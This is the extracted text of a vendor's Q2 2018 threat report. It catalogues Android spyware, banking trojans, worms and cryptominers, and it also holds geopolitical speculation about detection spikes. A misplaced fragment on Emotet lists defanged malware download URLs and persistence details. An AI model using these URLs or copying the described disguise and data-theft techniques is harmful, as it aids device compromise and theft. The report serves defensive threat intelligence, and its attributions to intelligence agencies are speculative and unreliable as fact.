MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
